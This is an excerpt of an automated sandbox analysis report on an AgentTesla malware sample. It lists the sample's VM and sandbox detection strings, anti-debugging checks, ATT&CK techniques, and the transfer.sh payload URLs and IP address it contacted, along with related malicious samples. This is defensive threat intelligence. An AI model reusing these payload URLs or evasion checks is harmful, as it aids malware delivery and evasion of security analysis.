                  Source: AgentTesla.exeBinary or memory string: Running GoogleCompute Environment MechanismGoogleCompute Environment Mechanism positve resultGoogleCompute Environment Mechanism negative resultMICROSOFTAZUREPopulating PARALLELS VM AttributesPARALLELSPARALLELSPopulating QEMU VM AttributesQEMUVIRTUALBOXVIRTUALBOXMICROSOFTVIRTUALPCMICROSOFTHYPERVPopulating VMWARE Attributes....VMWAREDESKTOPSERVERVMWAREAttribute Population Done
                  Source: AgentTesla.exe, 00000000.00000002.380743065.0000000000996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: AgentTesla.exeBinary or memory string: QEMU Detection negative result
                  Source: AgentTesla.exeBinary or memory string: Running QEMU-specific CPUID Detection Mechanism
                  Source: AgentTesla.exeBinary or memory string: QEMU-specific CPUID test negative
                  Source: AgentTesla.exeBinary or memory string: Populating QEMU VM Attributes
                  Source: AgentTesla.exeBinary or memory string: QEMU detected
                  Source: AgentTesla.exeBinary or memory string: START_LICENSESTART_LICENSE.lic%s > %sVM_ALLVM_ALLPHYSICALPHYSICALVM_ONLYVM_ONLYVM_ALLVM_ALLVM_ONLYVM_ONLYVMWVMWPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYHYPER-VHYPER-VPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYXENXENPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYQEMUQEMUPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYPARALLELSPARALLELSPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYVIRTUALBOXVIRTUALBOXPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYAMAZONAMAZONPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYGOOGLEGOOGLEPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYAZUREAZUREPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYVPCVPCPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYPHYSICALPHYSICALVM_ALLVM_ALLi86_rei86_rei86_sei86_sei86_lsbi86_lsbamd64_reamd64_rex64_sex64_sex64_lsbx64_lsbit64_reit64_reit64_lsbit64_lsbppc_reppc_reppc_seppc_seppc_lsbppc_lsbppc64_reppc64_reppc64_seppc64_seppc64_lsbppc64_lsb%s <> , %d-%[^-]-%dSIGN%s=SIGN%s=NOMORE1460,INTERNET=%s
                  Source: AgentTesla.exeBinary or memory string: Running QEMU-specific Vm Detection Mechanism
                  Source: AgentTesla.exeBinary or memory string: VMwareVMware
                  Source: AgentTesla.exeBinary or memory string: HYPER-V
                  Source: AgentTesla.exeBinary or memory string: UNKNOWNVMUNKNOWNVMFailed to create WMI objectSELECT * FROM Win32_NetworkAdapterPNPDeviceIDVMBUS\GuidAzure detected on the following NIC:Error: Cmn Wmi query failedRunning AZURE-specific Vm Detection MechanismAZURE-specific detection positive resultAZURE-specific detection negative resultSELECT * FROM Failed to create WMI objectError: Cmn Wmi query failedWin32_BaseBoardProductVirtual Machines_vm_wmi_hyperv_detection - HyperV detecteds_vm_wmi_hyperv_detection - HyperV not detectedWin32_BIOSSerialNumberVMwares_vm_wmi_VMware_detection - VMware detecteds_vm_wmi_VMware_detection - VMware not detectedFailed to create WMI objectSELECT * FROM Win32_BIOSManufacturerinnotek GmbHSMBIOSBIOSVersionVirtualBoxError: Cmn Wmi query failedFailed to create WMI objectSELECT Name FROM Win32_PROCESSORNameQEMU Virtual CPUError: Cmn Wmi query failedSELECT * FROM Win32_DiskDriveCaptionQEMUModelQEMUError: Cmn Wmi query failedWin32_ComputerSystemManufacturerParallelss_vm_wmi_Parallels_detection - Parallels detected via Manufacturers_vm_wmi_Parallels_detection - Parallels not detected via ManufacturerFailed to create WMI objectSELECT HypervisorPresent FROM Win32_ComputerSystemHypervisorPresents_vm_wmi_HypervisorPresent_detection - HypervisorPresent detectedError: Cmn Wmi query failedWin32_BaseBoardProductVirtual MachineWMI Vm Detection MechanismWMI checking for VM_WMI_HYPERVWMI checking for VM_WMI_VMWAREWMI checking for VM_WMI_VIRTUALBOXWMI checking for VM_WMI_QEMUWMI checking for VM_WMI_PARALLELSWMI checking for VM_FAMILY_UNKNOWNWMI Vm Detection Mechanism positive resultWMI Vm Detection Mechanism negative resultRunning QEMU-specific CPUID Detection MechanismInspecting signatures, displaying non-trivial instances....KVMKVMKVMQEMU detected using cpuid mechanismQEMU-specific CPUID test negativeQEMURunning QEMU-specific Vm Detection MechanismQEMU Detection positive resultQEMU Detection negative resultRunning XEN-specific CPUID Detection MechanismInspecting signatures, displaying non-trivial instances....XenVMMXenVMMXen detected using cpuid mechanismXEN-specific CPUID test negativeRunning XEN-specific Vm Detection MechanismXEN-specific CPUID Detection positive resultXEN-specific CPUID Detection negative resultXENXENAnalyzing signature....XenVMMXenVMMXenVMMXenVMM detectedVMwareVMwareVMwareVMware detectedMicrosoft HvMicrosoft Hv detectedKVMKVMKVMKVM detected but ignoredUnknown hypervisor detectedRunning CPUID Vm Detection MechanismCPUID instruction not implementedCPUID instruction supportedRunning Windows-specific CPUID Detection Mechanism....Obtained signature....Microsoft HvSuccess: Non-Hv hypervisor detectedWindows-specific non-Hv CPUID Detection Mechanism SuccessWindows-specific non-Hv CPUID Detection Mechanism FailedBasic Hypervisor present bit setObtained signature....<empty>Signature recognizedBasic Hypervisor present bit not setCPUID Hypervisor Detection positive resultCPUID Hypervisor Detection negative resultCPUID Vm Detection positive resultCPUID Vm Detection negative r
                  Source: AgentTesla.exeBinary or memory string: QEMU detected using cpuid mechanism
                  Source: AgentTesla.exeBinary or memory string: QEMU Detection positive result

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\AgentTesla.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\Desktop\AgentTesla.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\AgentTesla.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\AgentTesla.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\Desktop\AgentTesla.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\Desktop\AgentTesla.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\AgentTesla.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.AgentTesla.exe.6ec9a88.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.AgentTesla.exe.6ec9a88.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AgentTesla.exe PID: 6368, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.2.AgentTesla.exe.6ec9a88.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.AgentTesla.exe.6ec9a88.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AgentTesla.exe PID: 6368, type: MEMORYSTR
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts2
                  Command and Scripting Interpreter
                  Path Interception11
                  Process Injection
                  1
                  Masquerading
                  OS Credential Dumping321
                  Security Software Discovery
                  Remote Services11
                  Archive Collected Data
                  Exfiltration Over Other Network Medium11
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Disable or Modify Tools
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)241
                  Virtualization/Sandbox Evasion
                  Security Account Manager241
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                  Process Injection
                  NTDS1
                  Remote System Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer3
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information
                  LSA Secrets23
                  System Information Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common2
                  Obfuscated Files or Information
                  Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items32
                  Software Packing
                  DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 588752 Sample: AgentTesla.exe Startdate: 14/03/2022 Architecture: WINDOWS Score: 100 17 Found malware configuration 2->17 19 Malicious sample detected (through community Yara rule) 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 4 other signatures 2->23 6 AgentTesla.exe 15 5 2->6         started        process3 dnsIp4 15 transfer.sh 144.76.136.153, 443, 49767, 49770 HETZNER-ASDE Germany 6->15 13 C:\Users\user\AppData\...\AgentTesla.exe.log, ASCII 6->13 dropped 25 Detected unpacking (changes PE section rights) 6->25 27 Query firmware table information (likely to detect VMs) 6->27 29 Tries to detect sandboxes and other dynamic analysis tools (window names) 6->29 31 Tries to detect sandboxes / dynamic malware analysis system (registry check) 6->31 11 aspnet_compiler.exe 6->11         started        file5 signatures6 process7

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  AgentTesla.exe31%VirustotalBrowse
                  AgentTesla.exe44%ReversingLabsWin32.Trojan.GenCBL
                  No Antivirus matches
                  SourceDetectionScannerLabelLinkDownload
                  0.2.AgentTesla.exe.1310000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://169.254.169.254/http://169.254.169.254/latest/meta-datalatest/meta-data/public-ipv4%clatest/m0%Avira URL Cloudsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://www.macrovision.com/fnp/2004/11/activation0%VirustotalBrowse
                  http://www.macrovision.com/fnp/2004/11/activation0%Avira URL Cloudsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                  https://sectigo.com/CPS0D0%URL Reputationsafe

                  Download Network PCAP: filteredfull

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  transfer.sh
                  144.76.136.153
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://transfer.sh/get/jwhuCr/devvvv.txtfalse
                      high
                      https://transfer.sh/get/iGs052/BASE64.txtfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://169.254.169.254/http://169.254.169.254/latest/meta-datalatest/meta-data/public-ipv4%clatest/mAgentTesla.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tAgentTesla.exefalse
                        • URL Reputation: safe
                        unknown
                        https://transfer.shAgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.macrovision.com/fnp/2004/11/activationAgentTesla.exefalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.sectigo.com0AgentTesla.exefalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipAgentTesla.exe, 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#AgentTesla.exefalse
                            • URL Reputation: safe
                            unknown
                            https://sectigo.com/CPS0DAgentTesla.exefalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            144.76.136.153
                            transfer.shGermany
                            24940HETZNER-ASDEfalse
                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:588752
                            Start date:14.03.2022
                            Start time:17:00:55
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 5m 43s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:AgentTesla.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@3/2@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Excluded IPs from analysis (whitelisted): 23.35.236.56, 23.211.6.115, 80.67.82.211, 80.67.82.235
                            • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, fs.microsoft.com, store-images.s-microsoft.com, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            17:02:20API Interceptor1x Sleep call for process: AgentTesla.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            144.76.136.153tXDPyCfwcY.exeGet hashmaliciousBrowse
                            • transfer.sh/get/fvp22f/Aiebe.jpg
                            4G5k6vDDlx.exeGet hashmaliciousBrowse
                            • transfer.sh/get/a9xgDe/Gudsp.jpg
                            81cofLYh1o.exeGet hashmaliciousBrowse
                            • transfer.sh/get/guc4Cl/Mppvcqd.jpg
                            SecuriteInfo.com.Trojan.DownloaderNET.322.17731.exeGet hashmaliciousBrowse
                            • transfer.sh/get/uM4ooB/Xvyspuzxq.png
                            Hr0Hgb5CWj.exeGet hashmaliciousBrowse
                            • transfer.sh/get/q9wdd6/Mvuizr.log
                            3baQS3WUdx.exeGet hashmaliciousBrowse
                            • transfer.sh/get/IJwL7t/Kkvkby.png
                            Jnfgs.exeGet hashmaliciousBrowse
                            • transfer.sh/get/SkEyQd/Jnfgs.png
                            Cheat_Setup.exeGet hashmaliciousBrowse
                            • transfer.sh/get/6MBXDe/Srueaakv.png
                            FCsaYN4YXX.exeGet hashmaliciousBrowse
                            • transfer.sh/get/bwkgO4/Daggl.jpg
                            vVh3lBaKu8.exeGet hashmaliciousBrowse
                            • transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
                            Jaravoi.exeGet hashmaliciousBrowse
                            • transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
                            Qxyey.exeGet hashmaliciousBrowse
                            • transfer.sh/get/5WciVO/Qxyey.jpg
                            AutoInstall.exeGet hashmaliciousBrowse
                            • transfer.sh/get/Vr8NiB/Sgntfszp.log
                            setup.exeGet hashmaliciousBrowse
                            • transfer.sh/get/Vr8NiB/Sgntfszp.log
                            r1gnvYRnsz.exeGet hashmaliciousBrowse
                            • transfer.sh/get/Vr8NiB/Sgntfszp.log
                            C4TdpMeL4x.exeGet hashmaliciousBrowse
                            • transfer.sh/get/Q2ccFQ/Mruvwuq.jpg
                            m28WwC2t8H.exeGet hashmaliciousBrowse
                            • transfer.sh/get/fTXBOF/Sldabyj.png
                            EasyCheat.exeGet hashmaliciousBrowse
                            • transfer.sh/get/ittola/Scqrsdtrl.png
                            OZ5XkYPXcG.exeGet hashmaliciousBrowse
                            • transfer.sh/get/XN16WS/Psminaz.png
                            ORDER 211011A.xlsmGet hashmaliciousBrowse
                            • transfer.sh/get/HyKymv/wordart.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            transfer.shhttps://transfer.sh/get/vaJpNR/pyipHdxl-score.rtfGet hashmaliciousBrowse
                            • 144.76.136.153
                            EC009800776.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            DHL Express Shipping Docx.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            Payment Returned.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            SWIFT Copy_qdf.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            Neue Bestellung.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            DHL Express Tracking Number.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            SecuriteInfo.com.W32.MSIL_Agent.CYD.genEldorado.27686.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            TSLpexqK42.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            SaXu3fKoNG.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            NEW_VOICE_MESSAGE001210.EXEGet hashmaliciousBrowse
                            • 144.76.136.153
                            110322PAYMENT ADVICE.IMG.EXEGet hashmaliciousBrowse
                            • 144.76.136.153
                            Tax2020.xllGet hashmaliciousBrowse
                            • 144.76.136.153
                            DHL Delivery Document.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            ORDER0999809.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            ATTACHME.EXEGet hashmaliciousBrowse
                            • 144.76.136.153
                            tXDPyCfwcY.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            WIRE_PAYMENT_RETURNED120_VA.EXEGet hashmaliciousBrowse
                            • 144.76.136.153
                            KVDKGYBAXAKQX_PAYMENT_COPY.VBSGet hashmaliciousBrowse
                            • 144.76.136.153
                            kTzHVjSreo.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            HETZNER-ASDEc04iSMfWfd.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            qE7gTdRgEs.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            IZ6tnHq5Bc.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            4NKpZbdGLg.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            ZBR3F6XEkt.dllGet hashmaliciousBrowse
                            • 5.9.116.246
                            Datei 47446405.xlsmGet hashmaliciousBrowse
                            • 78.47.204.80
                            AVISO-268.xlsmGet hashmaliciousBrowse
                            • 78.47.204.80
                            allegati_9.xlsmGet hashmaliciousBrowse
                            • 78.47.204.80
                            94224UVHQ_46453820.xlsmGet hashmaliciousBrowse
                            • 78.47.204.80
                            RechnungsDetailsX2022.14.03_1521.xlsmGet hashmaliciousBrowse
                            • 5.9.116.246
                            nsIsjTDu8X.dllGet hashmaliciousBrowse
                            • 5.9.116.246
                            LbbXH4Uecv.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            2022AV00007340.xlsmGet hashmaliciousBrowse
                            • 5.9.116.246
                            qGRER3obth2P2UXmSjlPL.dllGet hashmaliciousBrowse
                            • 5.9.116.246
                            AHxoP6j0rp.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            R4ksbAeCc3.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            iNKrYBVPz8.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            AVISO_300482092.zls.xlsmGet hashmaliciousBrowse
                            • 78.47.204.80
                            MnyeMRsnn6.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            W5YDqaiNfF.dllGet hashmaliciousBrowse
                            • 78.47.204.80
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0e1afe86f0cc4dab4d6389c4a4dbbed28b57a598d462ada.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            parking list details.pdf..exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            Neon.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            https://webmail.webmailser.repl.co/#rbruce@hwlochner.comGet hashmaliciousBrowse
                            • 144.76.136.153
                            http://dhamp.webuiltideas.com/tom.murphy@aspenleafenergy.comGet hashmaliciousBrowse
                            • 144.76.136.153
                            MAWB 057-05763984 AWB 057-04914954.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            KCR2JIl6tT.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            Xwbnutju98765456789.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            EC009800776.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            bin nn.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            Bank Details.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            Payment Returned.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            remittance details.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            https://u25857462.ct.sendgrid.net/ls/click?upn=7xDwQ3ft1Kxf4fyCqKy-2F5OCMLBJPIF5W1NASdIdmCiueU-2BGlicIVYIWixRGtELjueWPTsQvfikpYzXbC-2Bz60xPMpsHPBPePjZuoY6y8P8B4-3D5QiD_jsvxW-2B08pXiJZk1Eut12iR1VqV7PpGybrXAgF-2BP72EoYCex6z58uf0NNmYZr-2FzclAl847e3jc8vVBRFfsvgaxHksNQEs-2F80P9NE7ZnYOGQ9UmYOR0fyDFMS8Yps1MRl5bVHAAeOJG8DpwhwHuxxfvz1uyhTah6iqFNVTGnT67aFBnYbokWj2lb8HPAe1VMgEWHD-2BI5fmwv3S6fbsSeClplEOoAoBpLXIB-2BPUooln2I74slP7cclah0I7b92IBTjEIkfMi96nFBE60fwP3HYVQc8y8SCF9jN8S5H6SVWPZF2uLT-2BmWMCyGYDJfxVDFY6HaJYbFEZPfwHRIYqf0b7OriY1-2BRYmBwbD-2FZwNriQCUE8fWjKWnGyGdGvYgnnAQkHItGiyLk68M32pqOQxf0F9Uh-2Fso6gOy0QrZfK9op3USCjuiBJ8y92JzGgdsXqiL7GILUJiQqwOdj3KQs-2FBd4IzW3eFUYtMas1gQg2AsZ2ShdSCFAg7X3oGfIpgsyqNX9r4DOuESrpPhatEetGV-2BWoYdCpJvss-2BSEqqOcQ2XZ8INhH-2BoAIeK-2Bd1DIVt6cfAzzfkwfJov-2F189sATJXK7sWtQl42n78MzalZpJxvopQPd1dZwm1xmUn2xuAx7JjxiHM156Nb7VKpb7v4UvxiVguFBcgzdwSnIQcJtXRyiYWp6g9-2BW6OQnz1cvqe8uMbd0R4Fjm9tT25YJJoHdI1jR1msA9GgFyhSgv57m2jPCL51Xg6OgxI9SnXVSia6PZv6j4ae0LjaLB1p6RYCfLaqbWYueafJzkVUL774Ty1icDepr4SeZvQXthXu4cBR6UT4MklGLF3zr0qeSFPa0dtA87IQJRpiZleAsuqYrAB-2FwsCXdZ7Kg4cNGR-2BnG1cUJmARmolRHGet hashmaliciousBrowse
                            • 144.76.136.153
                            2babbb.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            SWIFT Copy_qdf.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            Neue Bestellung.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            SzZUGntg6K.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            DHL Express Tracking Number.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            XQ25J7n59z.exeGet hashmaliciousBrowse
                            • 144.76.136.153
                            No context
                            Process:C:\Users\user\Desktop\AgentTesla.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16
                            Entropy (8bit):3.875
                            Encrypted:false
                            SSDEEP:3:4BES8Wyn:4B4Wyn
                            MD5:A63AE2B4C597F899C16A571BDD4B3862
                            SHA1:52289B6B0A243664D523D7E6ED5DFF597AD4AE73
                            SHA-256:1AE934E431A616E6E183A17EEA411C584E59E60B157E298862516A11999BE020
                            SHA-512:1B5FEFC99CD9EACC787F2E874C13AD9733C3274DE5E05A6EF9EAEDEAD3EBAA5974B9A887785274498C63476F3D77009BE2B8B63CD402489F156630A7BD693D9B
                            Malicious:false
                            Reputation:low
                            Preview:d.dn.w...k7H.V.^
                            Process:C:\Users\user\Desktop\AgentTesla.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):944
                            Entropy (8bit):5.364592299424785
                            Encrypted:false
                            SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84j:MxHKXwYHKhQnoPtHoxHhAHKzvKvj
                            MD5:E0DA8EEA094355AF7E5DABCD9FE68706
                            SHA1:FBFC0A86297BDFB11B96F78CFAFE67DCDF610B72
                            SHA-256:A2D206F393A2CC97D57198A77FE1CF167CB2881B10C7032BB83B4D6BCD3AD24E
                            SHA-512:9B8633118D5F3CBAE1F66CD6538ED810B8995A764349595D6250755BEBB21A02DBC66149D92AF3E2E584CE1471D7B522F3021C1E9BA92D75507283F21BBA8338
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.660303287732489
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.10%
                            • InstallShield setup (43055/19) 0.43%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            File name:AgentTesla.exe
                            File size:7255264
                            MD5:81448798cca71e2b8bce354afcf098b4
                            SHA1:29c1fbbaad4d5b988b570741b733120801f7ebcc
